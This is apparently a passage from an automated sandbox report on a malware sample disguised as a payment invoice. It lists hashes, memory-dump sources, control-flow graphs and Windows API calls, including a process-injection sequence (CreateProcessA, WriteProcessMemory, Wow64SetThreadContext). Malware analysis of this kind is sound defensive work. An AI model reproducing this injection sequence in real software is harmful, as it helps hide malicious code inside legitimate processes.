                                                                                              • Opcode Fuzzy Hash: 0e76b1ddd58bd87818f7859088155224ea8f3372af75c310451f9e8abc2c806e
                                                                                              • Instruction Fuzzy Hash: 1B518F75D016199FDB04CFEAD8846EEBBB2FF89300F10902AE919AB254DB745A46CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74364ef64c27632e8809a53647ac25671329977525198359e304a8fa0e3bc792
                                                                                              • Instruction ID: 8bc0b55f5c359a8aed4addfd4255c082d8b1b217256f7fd8d2a222feccb40401
                                                                                              • Opcode Fuzzy Hash: 74364ef64c27632e8809a53647ac25671329977525198359e304a8fa0e3bc792
                                                                                              • Instruction Fuzzy Hash: D941A475E006188FDB08CFAAC88569EFBF2BF89300F14C06AE419AB354DB345945CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d290ce914146be1b7593fc7e193d59e52482ce2367784c8f0c3bb3a3da2b254
                                                                                              • Instruction ID: aa025ff6bb028c4a241c7a68112a5dc1ca925ced2ed1af657f8363766699745f
                                                                                              • Opcode Fuzzy Hash: 1d290ce914146be1b7593fc7e193d59e52482ce2367784c8f0c3bb3a3da2b254
                                                                                              • Instruction Fuzzy Hash: C1A00200CEF1AD8080461D1451005F5D1FC020B209E50F444FA0FF79560824C280901D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 294 149d3c9-149d467 GetCurrentProcess 299 149d469-149d46f 294->299 300 149d470-149d4a4 GetCurrentThread 294->300 299->300 301 149d4ad-149d4e1 GetCurrentProcess 300->301 302 149d4a6-149d4ac 300->302 304 149d4ea-149d505 call 149d5a8 301->304 305 149d4e3-149d4e9 301->305 302->301 308 149d50b-149d53a GetCurrentThreadId 304->308 305->304 309 149d53c-149d542 308->309 310 149d543-149d5a5 308->310 309->310
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D456
                                                                                              • GetCurrentThread.KERNEL32 ref: 0149D493
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D4D0
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0149D529
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 8174c7a4f0b6f14127975c1e5a36a2abc68b79d1ce23326f58703d096ef37930
                                                                                              • Instruction ID: ce975a3ef6c2a1adb8959edc615cf69d46d5e790dbc26167c77de911396bb987
                                                                                              • Opcode Fuzzy Hash: 8174c7a4f0b6f14127975c1e5a36a2abc68b79d1ce23326f58703d096ef37930
                                                                                              • Instruction Fuzzy Hash: 555165B09003498FDB18CFAAD948B9EBFF1EF89314F24845AE509A72A0D7346944CF61

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 317 149d3d8-149d467 GetCurrentProcess 321 149d469-149d46f 317->321 322 149d470-149d4a4 GetCurrentThread 317->322 321->322 323 149d4ad-149d4e1 GetCurrentProcess 322->323 324 149d4a6-149d4ac 322->324 326 149d4ea-149d505 call 149d5a8 323->326 327 149d4e3-149d4e9 323->327 324->323 330 149d50b-149d53a GetCurrentThreadId 326->330 327->326 331 149d53c-149d542 330->331 332 149d543-149d5a5 330->332 331->332
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D456
                                                                                              • GetCurrentThread.KERNEL32 ref: 0149D493
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0149D4D0
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0149D529
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 240e2df396b8219fad466e979cca0b55ff0587953c77cb91a96199d2695393b9
                                                                                              • Instruction ID: dcd6bbd61337a90b80b21e141e3b9f372cf2a7ddf9ef7f9ec5130b0693709439
                                                                                              • Opcode Fuzzy Hash: 240e2df396b8219fad466e979cca0b55ff0587953c77cb91a96199d2695393b9
                                                                                              • Instruction Fuzzy Hash: DB5144B09013098FDB18DFAAD948B9EBFF1EB88314F24845AE519A7360D7346944CF65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1563 58344d8-58344e5 1564 58344e7-58344f6 1563->1564 1565 58344f9-583454a call 5834328 1563->1565 1564->1565 1571 58345b0-58345dc 1565->1571 1572 583454c-583454e 1565->1572 1573 58345e3-58345eb 1571->1573 1572->1573 1574 5834554-5834560 1572->1574 1578 58345f2-583472d 1573->1578 1574->1578 1579 5834566-58345af call 5834334 1574->1579 1598 5834733-5834741 1578->1598 1599 5834743-5834749 1598->1599 1600 583474a-5834790 1598->1600 1599->1600 1605 5834792-5834795 1600->1605 1606 583479d 1600->1606 1605->1606 1607 583479e 1606->1607 1607->1607
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq$Hiq
                                                                                              • API String ID: 0-2624443307
                                                                                              • Opcode ID: 2539ebfe1de0930d5359b597a9f2c46b0968e20ff13c8efb9bcfd21cbbb1c13a
                                                                                              • Instruction ID: e5b9d81d2de0a81c0c10303b939c61f597e18b9f24e9ea42eddf4641a80f6368
                                                                                              • Opcode Fuzzy Hash: 2539ebfe1de0930d5359b597a9f2c46b0968e20ff13c8efb9bcfd21cbbb1c13a
                                                                                              • Instruction Fuzzy Hash: C2815C70E002599FCF05DFA9C8986AEBFB6FF89300F14816AD409EB364DB745945CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1608 5830007-5830141 1628 5830144 call 5830b58 1608->1628 1629 5830144 call 5830b68 1608->1629 1613 583014a-5830163 1617 58301c5-5830236 1613->1617 1618 5830165-58301bd 1613->1618 1632 5830238 call 58367f2 1617->1632 1633 5830238 call 58367d0 1617->1633 1634 5830238 call 5836800 1617->1634 1618->1617 1620 583023d-583025d 1630 5830260 call 58369b8 1620->1630 1631 5830260 call 58369c8 1620->1631 1622 5830263-58302aa 1628->1613 1629->1613 1630->1622 1631->1622 1632->1620 1633->1620 1634->1620
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-227171996
                                                                                              • Opcode ID: d9ffef48f9768acf63fb08ba3ec1f3b0fb96d376834979da28440e058f20b4cf
                                                                                              • Instruction ID: d27d33bbb7e98d7b3812c70622e9ae720aab6eebb046b13b1a4b219305a821d5
                                                                                              • Opcode Fuzzy Hash: d9ffef48f9768acf63fb08ba3ec1f3b0fb96d376834979da28440e058f20b4cf
                                                                                              • Instruction Fuzzy Hash: 8C810435910741CFEB02DF68D8A45447BF1FF96314B4686A9D849AF32AEB75E888CF40

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1635 5834468-5834f1a 1638 5834f23-5834f33 1635->1638 1639 5834f1c-5834ff7 1635->1639 1641 5834f39-5834f49 1638->1641 1642 5834ffe-58350d0 1638->1642 1639->1642 1641->1642 1643 5834f4f-5834f53 1641->1643 1661 58350d7-58356aa 1642->1661 1645 5834f55 1643->1645 1646 5834f5b-5834f7a 1643->1646 1645->1642 1645->1646 1648 5834fa1-5834fa6 1646->1648 1649 5834f7c-5834f9c call 58344b4 call 5834448 call 5834458 1646->1649 1650 5834fa8-5834faa call 58344c4 1648->1650 1651 5834faf-5834fc2 call 5834424 1648->1651 1649->1648 1650->1651 1651->1661 1662 5834fc8-5834fcf 1651->1662
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (iq$Hiq
                                                                                              • API String ID: 0-2459830773
                                                                                              • Opcode ID: 4157c6433d3bce84a9db0a0a1f356361708fc8c78d18c0c73b42776a3e84f615
                                                                                              • Instruction ID: c8edb723f713e85c502b82dfffd0c5aa1da4b45bd4284695a904bfe32981a9cb
                                                                                              • Opcode Fuzzy Hash: 4157c6433d3bce84a9db0a0a1f356361708fc8c78d18c0c73b42776a3e84f615
                                                                                              • Instruction Fuzzy Hash: 0251D2B0B002599FCF15AFA9C45967F7AFAFBC8300F144969D806E7395DA348D0187E5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1681 5830040-5830141 1704 5830144 call 5830b58 1681->1704 1705 5830144 call 5830b68 1681->1705 1686 583014a-5830163 1690 58301c5-5830236 1686->1690 1691 5830165-58301bd 1686->1691 1701 5830238 call 58367f2 1690->1701 1702 5830238 call 58367d0 1690->1702 1703 5830238 call 5836800 1690->1703 1691->1690 1693 583023d-583025d 1706 5830260 call 58369b8 1693->1706 1707 5830260 call 58369c8 1693->1707 1695 5830263-58302aa 1701->1693 1702->1693 1703->1693 1704->1686 1705->1686 1706->1695 1707->1695
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-227171996
                                                                                              • Opcode ID: 2bf046534edac2f08a837994b37dc3f0213cc962b4bd9df6b10083fedc1c4022
                                                                                              • Instruction ID: fa24e70f307910796e7ac1e476893d8eebea05251bd37cf9643ed8b05cafee03
                                                                                              • Opcode Fuzzy Hash: 2bf046534edac2f08a837994b37dc3f0213cc962b4bd9df6b10083fedc1c4022
                                                                                              • Instruction Fuzzy Hash: 7561DF34A10701CFEB11EF68D494545B7F1FF99314B4286A9D949AF32AEB71E898CF80

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1708 583de88-583deab 1709 583deb5-583deb8 1708->1709 1710 583dec1-583dffd 1709->1710
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq$4'eq
                                                                                              • API String ID: 0-907361030
                                                                                              • Opcode ID: 6000cdd02dfa9008cb0e162169c865b9b5764e5618a79931e17e283d7fde1c9e
                                                                                              • Instruction ID: 58788d8c31e8e24cbf4bc1e84743ff5e6837f440c2f6b1f1cfa10af4a6ff2fae
                                                                                              • Opcode Fuzzy Hash: 6000cdd02dfa9008cb0e162169c865b9b5764e5618a79931e17e283d7fde1c9e
                                                                                              • Instruction Fuzzy Hash: 9A418371D1070A9BDB10EFB9E8506DEB772FFA4310F61462AE514BB251EBB07985CB80

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1724 583de98-583deb8 1726 583dec1-583dffd 1724->1726
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq$4'eq
                                                                                              • API String ID: 0-907361030
                                                                                              • Opcode ID: 403b1d17e145b4d215af237516e9e1cf40cfe59e6cd785bf6df901d0b2edad0c
                                                                                              • Instruction ID: b23584f5b7f52c28deb8cdb02cba45a995e653406124366e5daa28ea4a9574b8
                                                                                              • Opcode Fuzzy Hash: 403b1d17e145b4d215af237516e9e1cf40cfe59e6cd785bf6df901d0b2edad0c
                                                                                              • Instruction Fuzzy Hash: AD417371D1070A9BDB00EFA9E8506DEF772FFA4310F61462AE514BB251EBB07985CB80

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1809 98de850-98de8e5 1811 98de91e-98de93e 1809->1811 1812 98de8e7-98de8f1 1809->1812 1819 98de977-98de9a6 1811->1819 1820 98de940-98de94a 1811->1820 1812->1811 1813 98de8f3-98de8f5 1812->1813 1814 98de918-98de91b 1813->1814 1815 98de8f7-98de901 1813->1815 1814->1811 1817 98de905-98de914 1815->1817 1818 98de903 1815->1818 1817->1817 1821 98de916 1817->1821 1818->1817 1826 98de9df-98dea99 CreateProcessA 1819->1826 1827 98de9a8-98de9b2 1819->1827 1820->1819 1822 98de94c-98de94e 1820->1822 1821->1814 1824 98de971-98de974 1822->1824 1825 98de950-98de95a 1822->1825 1824->1819 1828 98de95c 1825->1828 1829 98de95e-98de96d 1825->1829 1840 98dea9b-98deaa1 1826->1840 1841 98deaa2-98deb28 1826->1841 1827->1826 1831 98de9b4-98de9b6 1827->1831 1828->1829 1829->1829 1830 98de96f 1829->1830 1830->1824 1832 98de9d9-98de9dc 1831->1832 1833 98de9b8-98de9c2 1831->1833 1832->1826 1835 98de9c4 1833->1835 1836 98de9c6-98de9d5 1833->1836 1835->1836 1836->1836 1838 98de9d7 1836->1838 1838->1832 1840->1841 1851 98deb38-98deb3c 1841->1851 1852 98deb2a-98deb2e 1841->1852 1854 98deb4c-98deb50 1851->1854 1855 98deb3e-98deb42 1851->1855 1852->1851 1853 98deb30 1852->1853 1853->1851 1857 98deb60-98deb64 1854->1857 1858 98deb52-98deb56 1854->1858 1855->1854 1856 98deb44 1855->1856 1856->1854 1859 98deb76-98deb7d 1857->1859 1860 98deb66-98deb6c 1857->1860 1858->1857 1861 98deb58 1858->1861 1862 98deb7f-98deb8e 1859->1862 1863 98deb94 1859->1863 1860->1859 1861->1857 1862->1863 1865 98deb95 1863->1865 1865->1865
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 098DEA86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: d483a99a3ffe6b9b82e8737a6b4035f288528af963ab4fc03874fcb27b5c2a4a
                                                                                              • Instruction ID: 4e305969d1904ab41bd94fc682b1b79e826e3444eb055ffc389345a2cdea437f
                                                                                              • Opcode Fuzzy Hash: d483a99a3ffe6b9b82e8737a6b4035f288528af963ab4fc03874fcb27b5c2a4a
                                                                                              • Instruction Fuzzy Hash: D4915B71D012199FEF20DF69C881BADBBB2BF48310F148169E849EB351DB749985CF91
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0149AF9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: bd82854dbfbdc1ee4148d52cfacd75b2e343e9b701546d5ce42af42b19e0274a
                                                                                              • Instruction ID: 894a907a98ac148ac458228f4c330192d7774ca79253a916266734ce8b5e7010
                                                                                              • Opcode Fuzzy Hash: bd82854dbfbdc1ee4148d52cfacd75b2e343e9b701546d5ce42af42b19e0274a
                                                                                              • Instruction Fuzzy Hash: AC8146B0A00B058FDB24DF2AD44475ABBF1FF88314F24892ED44A9BB61D735E945CB91
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 8a3414bf70633161cedee4732c4361824b8e4256884b4fc1d69d7d19f3a762d0
                                                                                              • Instruction ID: 9144e7eae300211661b6aad65eafbbcb527df507ca25f183d6a68b6d8d606aa2
                                                                                              • Opcode Fuzzy Hash: 8a3414bf70633161cedee4732c4361824b8e4256884b4fc1d69d7d19f3a762d0
                                                                                              • Instruction Fuzzy Hash: 0451F0B1C00719CFDB25CFAAC884B9EBBF5BF49314F20806AD508AB261D7756949CF90
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03291A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 3633f389e127762dcab98d9f0d85f569ddede8b997c64bff544b0b662fd45e63
                                                                                              • Instruction ID: 6cc3600f1991800c8db66f8f822dc74f3de4daf371533da892763ff0c658a0e5
                                                                                              • Opcode Fuzzy Hash: 3633f389e127762dcab98d9f0d85f569ddede8b997c64bff544b0b662fd45e63
                                                                                              • Instruction Fuzzy Hash: 8151C3B1D103499FDF14CF9AC884ADEBBB5FF49310F64812AE819AB250D771A985CF90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq
                                                                                              • API String ID: 0-1552367303
                                                                                              • Opcode ID: a35c9e57fc13b6161aace775666e994b5b81e23090772df8328e7ad385b4c95c
                                                                                              • Instruction ID: 7e7c74f103ec8984966e4f8f48f66ba47184801bca078a34b0ee98f7f8e64152
                                                                                              • Opcode Fuzzy Hash: a35c9e57fc13b6161aace775666e994b5b81e23090772df8328e7ad385b4c95c
                                                                                              • Instruction Fuzzy Hash: 6CE1BF70B012098FCB15DFACE4856AEBBB2FFD8310F548569D809AB355DB74AD46CB80
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03291A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 24925bb8aff1f45480a8ce3fb74c6ccdfdbc2afe952331f80ee10c8d55d19fa5
                                                                                              • Instruction ID: ab2ad1882322db4fb46158326dd5d88568617c64a604ec0c9f806e08acdde34f
                                                                                              • Opcode Fuzzy Hash: 24925bb8aff1f45480a8ce3fb74c6ccdfdbc2afe952331f80ee10c8d55d19fa5
                                                                                              • Instruction Fuzzy Hash: D241A0B1D103499FDF14CF9AC984ADEBBB5FF48310F64812AE819AB250D771A985CF90
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 1086b39b90e865066a5dfaecc26dcc576c8c3008fcf7195118a157e939d8a09f
                                                                                              • Instruction ID: a8a232690866fc9ba6797742b7fd175cafc5827a010d761a76947760374787e6
                                                                                              • Opcode Fuzzy Hash: 1086b39b90e865066a5dfaecc26dcc576c8c3008fcf7195118a157e939d8a09f
                                                                                              • Instruction Fuzzy Hash: 2D41D0B0C0071DCBDB25CFA9C884A9EBBF5FF49304F20815AD508AB265DB756949CF90
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 03294111
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: d5d513d2a29b3c6a02bac5eade70a2e10773ee5ffadb29adab4d7b31d3328084
                                                                                              • Instruction ID: 3eb96b222cc1c798c9456eccc8bb274814a76039b1bc4efe5bb6338681fa8627
                                                                                              • Opcode Fuzzy Hash: d5d513d2a29b3c6a02bac5eade70a2e10773ee5ffadb29adab4d7b31d3328084
                                                                                              • Instruction Fuzzy Hash: FB414BB9910309CFDB14DF8AC848A9ABBF5FF88314F24C459D519A7321D775A941CFA0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 098DE658
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 5de443caf00853d12d55ed6b7b6315da21db201e107d5abc2dc3ddf5ef5005c3
                                                                                              • Instruction ID: 93e35a6386a46967f40797913f1acf53113f0bbbfa28cd1fb534316e02598150
                                                                                              • Opcode Fuzzy Hash: 5de443caf00853d12d55ed6b7b6315da21db201e107d5abc2dc3ddf5ef5005c3
                                                                                              • Instruction Fuzzy Hash: 4B2157719003499FCB10CFA9D884BEEBBF5FF48320F10842EE918A7241DB789944DBA0
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 098DE658
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 5c88bd1c4db64cae069fa737bef9a80568b70c7c0412ed825bd8552bbc8cbab1
                                                                                              • Instruction ID: 7056a6f15f70ac7b524b8086a78af0bbff94c0f2ce4ec3e016bbce1ccadf805e
                                                                                              • Opcode Fuzzy Hash: 5c88bd1c4db64cae069fa737bef9a80568b70c7c0412ed825bd8552bbc8cbab1
                                                                                              • Instruction Fuzzy Hash: C12125719003499FCB10CFA9D985BEEBBF5FF48320F10842EE919A7241DB789944DBA4
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098DE4AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 745804d9afbdc7b33fed9361f8e304fa565697e1808d225914ea40e0702336ab
                                                                                              • Instruction ID: 8e9aeee8f781ca2d46f37ec9797cb0082769ba63e21e738f9660eb5a3b42b6b0
                                                                                              • Opcode Fuzzy Hash: 745804d9afbdc7b33fed9361f8e304fa565697e1808d225914ea40e0702336ab
                                                                                              • Instruction Fuzzy Hash: 39212572D002098FDB10DFA9C4857EEBBF5EF98324F14842ED519A7241CB789945DFA0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 098DE738
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 3e9c4aef19cf73c6ff4311e1eec00718684d73b73a7391aab01c3abc89f8ce7c
                                                                                              • Instruction ID: f2097a1b442950424c9928cce13e141b1896e0f35ebe95e93726397961547922
                                                                                              • Opcode Fuzzy Hash: 3e9c4aef19cf73c6ff4311e1eec00718684d73b73a7391aab01c3abc89f8ce7c
                                                                                              • Instruction Fuzzy Hash: 14214AB2C003499FCB10DFA9C884ADEBBF5FF48320F10842EE519A7251C7349941DBA0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149D6A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: abd559f682b375b70882e385f32b54f791b2776815959779145f43851ecad2dd
                                                                                              • Instruction ID: 5391f513e99a787ed8aa227d824b6cdf4816a763bb467a89e40914bbb506fbda
                                                                                              • Opcode Fuzzy Hash: abd559f682b375b70882e385f32b54f791b2776815959779145f43851ecad2dd
                                                                                              • Instruction Fuzzy Hash: A221E6B5D002499FDB10CF9AD984ADEBFF5FB49310F14805AE958A7310D374A940DFA5
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098DE4AE
                                                                                              Memory Dump Source
